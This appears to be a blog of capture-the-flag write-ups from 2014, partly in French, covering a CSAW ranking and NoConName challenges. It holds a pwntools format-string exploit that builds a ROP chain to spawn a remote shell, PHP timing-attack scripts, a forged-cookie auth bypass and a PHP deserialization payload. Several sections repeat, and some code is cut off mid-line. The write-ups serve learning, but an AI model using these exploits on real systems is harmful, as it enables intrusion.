Monday, November 24, 2014
Wednesday, October 15, 2014
CSAW 2014
Spiderz
Classement globale : 64
Classement catégorie other : 18
Nombre de point : 3360 (24 ème note )
Solves vs Fails : 89.6% vs 10.4 %
Notre taux Solves vs Fails et plus important que le
l’équipe classé N°1 (68.7%/31.2%)
Classements Equipes Marocaines : 64-489
-691-943 ( sur un total de 1174 équipes ayant participée)
Monday, September 15, 2014
eXPLicit
eXPLicit (not solved)
source
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *
REMOTE = 0
if REMOTE:
host = '88.87.208.163'
port = 7070
else:
host = '127.0.0.1'
port = 7070
def connect():
return remote(host, port)
def retrieve_val(res):
m = re.search('Your number is (.+) which is too low.', res)
if m:
leak = m.group(1)
return leak
else:
return None
def dump_stack():
for i in range(1, 100):
payload = (
"%%%d$x" % i +
'\n'
)
s.sendafter('Pick a number between 0 and 20: ', payload)
res = s.recvuntil('which is too low.')
leak = retrieve_val(res)
if leak:
print '%d: %s' % (i, leak)
else:
print buf
s.interactive()
def send_fmt(payload):
s.sendafter('Pick a number between 0 and 20: ', payload + '\n')
bss = 0x80d6080 + 0x100
int80 = 0x8082715 # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret
s = connect()
#dump_stack()
send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)
# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6
# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 1
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6
# execve("/bin/sh", ["/bin/sh", NULL], NULL)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x0b
p[retaddr+4*2] = popedx_ecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = bss+4*1
p[retaddr+4*5] = bss+4*3
p[retaddr+4*6] = int80
send_fmt(p.payload(6))
# ["/bin/sh", NULL]
p = FormatStr()
p[bss] = retaddr+4*1
p[bss+4*1] = bss+4*3
p[bss+4*2] = 0
p[bss+4*3] = '/bin'
p[bss+4*4] = '/sh\0'
send_fmt(p.payload(6))
s.interactive()
proMISCuous
proMISCuous (solved by kami)
[".$morrey."]"; $all[$char]=$morrey; //save all in array } $cracked=array_search(max($all), $all); // $key = 2; compare max value $final .=$cracked;// save max delai in one table // echo $final."\n"; Disable debugging unset($all); } $fp = fsockopen($host, $port); fwrite($fp, $cracked); echo $resultat = fgets($fp,80)."\n"; ?>tIMeMaTTerS
NcN_15d07db12cd83174f0d19ce7e8c65a7c5ffba7df Another exploit :
$val){
$sock = fsockopen("88.87.208.163", "6969");
$start =microtime(true);
fwrite($sock, $str.$val."\n");
$result=fgets($sock,1080);
$end =microtime(true);
$arr[]=($end-$start);
}
$str.=$char[array_search(max($arr), $arr)];
echo $char[array_search(max($arr), $arr)];
}
?>
STEGOsaurus
http://en.wikipedia.org/wiki/Hearing_range#Humans
human hearing is 20 Hz to 20 kHz
i try remove voice using audacity
audacity effect vocal remover fixer les frequence entre 20 et 20000 et Removal choice : Remove Frequence band
after morse to ascii manuel
human hearing is 20 Hz to 20 kHz
i try remove voice using audacity
audacity effect vocal remover fixer les frequence entre 20 et 20000 et Removal choice : Remove Frequence band
after morse to ascii manuel
WEBster
WEBster (solved by kami)
log as test/test
Bypass Permission Controle using loc=md5(127.0.0.1)
GET https://ctf.noconname.org/webster/content.php?op=4 HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/webster/
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9jmjodd20igc7svk7inmo350k4; loc=f528764d624db129b32c21fbca0cb8d6
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
log as test/test
Bypass Permission Controle using loc=md5(127.0.0.1)
GET https://ctf.noconname.org/webster/content.php?op=4 HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/webster/
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9jmjodd20igc7svk7inmo350k4; loc=f528764d624db129b32c21fbca0cb8d6
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Crypto spanish-book
Crypto (solved by kami)
file = open('spanish-book.enc', 'r')
content = file.read()
List1=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",",","_","!",".","-",")","(",";","?",":"]
List2=["b","s","a","d","x","F","g","H","n","J","K","l","t","m","O","u","c","d","s","T","i","V","W",",","Y","Z","q","e","o","p","g","r","(","v","f","b"]
for (x,y) in zip(List1,List2):
content.replace(x,y)
print content
pareciendole que aquella era propia desgracia de caballeros
andantesA g toda la atribuia a la falta de su caballod g no era
posible levantarseA segun tenia abrumado todo el cuerpos
capitulo quinto
donde se prosigue la narracion de la desgracia de nuestro
caballero
ncnJdeadbeafcafebadbabefeeddefacedbedfadedecviendoA puesA que en
efecto no podia menearseA acordo de acogerse a su ordinario
remedioA que era pensar en algun paso de sus librosA g traVole
su colera a la memoria aquel de baldovinos g del marques de
https://gist.github.com/rekkusu/47e369c3f74342970c31
file = open('spanish-book.enc', 'r')
content = file.read()
List1=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",",","_","!",".","-",")","(",";","?",":"]
List2=["b","s","a","d","x","F","g","H","n","J","K","l","t","m","O","u","c","d","s","T","i","V","W",",","Y","Z","q","e","o","p","g","r","(","v","f","b"]
for (x,y) in zip(List1,List2):
content.replace(x,y)
print content
pareciendole que aquella era propia desgracia de caballeros
andantesA g toda la atribuia a la falta de su caballod g no era
posible levantarseA segun tenia abrumado todo el cuerpos
capitulo quinto
donde se prosigue la narracion de la desgracia de nuestro
caballero
ncnJdeadbeafcafebadbabefeeddefacedbedfadedecviendoA puesA que en
efecto no podia menearseA acordo de acogerse a su ordinario
remedioA que era pensar en algun paso de sus librosA g traVole
su colera a la memoria aquel de baldovinos g del marques de
https://gist.github.com/rekkusu/47e369c3f74342970c31
MakeMeFeeWet^Hb
Makemefeelweb( solved by kami)
GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Hint comment found in top of the page : (Emac config)
<!-- vim: set ts=2 sw=2: --> <== @ HINT@already check it i think it means tabstop=2 and shiftwidth=2
tab width and code indent width.
<html>
<head>
<link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
<script src="assets/jquery-1.11.1.min.js"></script>
<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<title>WUT</title>
</head>
t's emac vuln
here a incomplete backup https://ctf.noconname.org/makemefeelweb/.login.php.swp
@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
if (isset($_COOKIE['JSESSIONID'])) {
if ($username == "p00p" && $password == "l!k34b4u5") { } }
$this->p = $_passwd; $this->u = $_uname;
class Creds {
public function __construct($_uname, $_passwd) {
public $p;
public $u;
Exploit :
class Creds {public $p = true;public $u = true;}
$exploit=new creds;echo base64_encode(bin2hex(serialize($exploit)));
POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5
NcN_7780*************************eba1578
GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Hint comment found in top of the page : (Emac config)
<!-- vim: set ts=2 sw=2: --> <== @ HINT@already check it i think it means tabstop=2 and shiftwidth=2
tab width and code indent width.
<html>
<head>
<link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
<script src="assets/jquery-1.11.1.min.js"></script>
<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<title>WUT</title>
</head>
t's emac vuln
here a incomplete backup https://ctf.noconname.org/makemefeelweb/.login.php.swp
@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
if (isset($_COOKIE['JSESSIONID'])) {
if ($username == "p00p" && $password == "l!k34b4u5") { } }
$this->p = $_passwd; $this->u = $_uname;
class Creds {
public function __construct($_uname, $_passwd) {
public $p;
public $u;
Exploit :
class Creds {public $p = true;public $u = true;}
$exploit=new creds;echo base64_encode(bin2hex(serialize($exploit)));
POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5
NcN_7780*************************eba1578
MISCall
MISCall (solved by kami)
I deploy the git, then it's applying the changes to be committed (we get a s.py)
# git stash pop
# On branch master
# Changes to be committed:
# (use "git reset HEAD <file>..." to unstage)
#
# new file: s.py
#
# Changes not staged for commit:
# (use "git add <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
#
# modified: flag.txt
#
Dropped refs/stash@{0} (1f824bb78af66d27d88d6b0de8a58e975061665e)
# ls
flag.txt s.py
root@ks3283938:/var/www/kami.ma/web/ctf# cat s.py
#!/usr/bin/env python
from hashlib import sha1
with open("flag.txt", "rb") as fd:
print "NCN" + sha1(fd.read()).hexdigest()
python s.py
NCN4dd992213ae6b76f27d7340f0dde1222888df4d3
I deploy the git, then it's applying the changes to be committed (we get a s.py)
# git stash pop
# On branch master
# Changes to be committed:
# (use "git reset HEAD <file>..." to unstage)
#
# new file: s.py
#
# Changes not staged for commit:
# (use "git add <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
#
# modified: flag.txt
#
Dropped refs/stash@{0} (1f824bb78af66d27d88d6b0de8a58e975061665e)
# ls
flag.txt s.py
root@ks3283938:/var/www/kami.ma/web/ctf# cat s.py
#!/usr/bin/env python
from hashlib import sha1
with open("flag.txt", "rb") as fd:
print "NCN" + sha1(fd.read()).hexdigest()
python s.py
NCN4dd992213ae6b76f27d7340f0dde1222888df4d3
Monday, July 7, 2014
Remote KG pcap file Analysis Temp
We have a pcap file first step is to identifies conversations :
we can see there is two interesting stream ( port 7777 and port 7272 ) , lets extract this data, click on follow stream
Click save as and now we have our stream in a raw format .
Next step is how to decode information in our extracted data .
Google searching :
Pemote GDB Packet format :
source
Every command sent from client to server start with $ flowed by packet data and checksum after #
after this we must to format our extracted data replace "$" by "\n$" and we will have our remote gdb conversation formated in standard remote gdb command .
Remote GDB useful command :
$g#67+
g--------------->Read general registers
67------------->checksum
+ -------------->Packet Acknowledgment
m--------------->m addr,length Read length bytes of memory starting at address addr
b7761800------>addr
fd---------------> length
32------------->checksum
+ -------------->Packet Acknowledgment
Remote GDB packet detail
we can see there is two interesting stream ( port 7777 and port 7272 ) , lets extract this data, click on follow stream
Click save as and now we have our stream in a raw format .
Next step is how to decode information in our extracted data .
Google searching :
Pemote GDB Packet format :
source
Every command sent from client to server start with $ flowed by packet data and checksum after #
after this we must to format our extracted data replace "$" by "\n$" and we will have our remote gdb conversation formated in standard remote gdb command .
Remote GDB useful command :
$g#67+
g--------------->Read general registers
67------------->checksum
+ -------------->Packet Acknowledgment
$mb7761800,fd#32+
m--------------->m addr,length Read length bytes of memory starting at address addr
b7761800------>addr
fd---------------> length
32------------->checksum
+ -------------->Packet Acknowledgment
Remote GDB packet detail
Subscribe to:
Posts (Atom)